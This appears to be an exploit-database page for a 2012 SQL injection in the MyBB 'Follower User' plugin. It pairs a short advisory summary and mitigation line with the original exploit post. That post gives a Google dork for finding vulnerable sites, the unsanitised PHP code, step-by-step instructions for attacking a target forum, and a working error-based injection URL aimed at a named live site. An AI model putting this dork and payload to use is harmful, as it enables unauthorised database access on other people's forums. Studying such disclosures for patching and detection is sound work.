Follower User MyBB plugin SQL Injection 0day

vendor:

Follower User Plugin

by:

Zixem

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Follower User Plugin

Affected Version From: 1.5+

Affected Version To: 1.5+

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

Follower User MyBB plugin SQL Injection 0day

The vulnerability exists within SuscribeUsers.php on SuscribeUsers_add() where the user input is not properly sanitized. An attacker can inject malicious SQL code into the 'usid' and 'uid' parameters of the 'misc.php' page. An example of the malicious URL is '/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]'. This can be used to gain access to the database and potentially execute arbitrary code.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized and does not contain malicious code.

Source

Exploit-DB raw data:

# Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.us
# Date: 13.10.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/suscriber-user
# Version: 1.5+
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within SuscribeUsers.php on SuscribeUsers_add():

<?
	$usid = $mybb->input[usid];	//Line 671
	$uid = $mybb->input[uid];	//Line 672
	if(user_awaiting($uid,$usid))	//Line 781
	{				//Line 782
		redirect("member.php?action=profile&uid=".$usid."#suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
	}				//Line 784
?>


----------------------------------------------

Instructions: 
1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:

/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]

----------------------------------------------

Demo: 
http://www.chidomobil-gc.com/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image : http://i.imgur.com/eGhzJ.png


Follow: https://twitter.com/PonyBlaze


Shotouts goes to FillySec.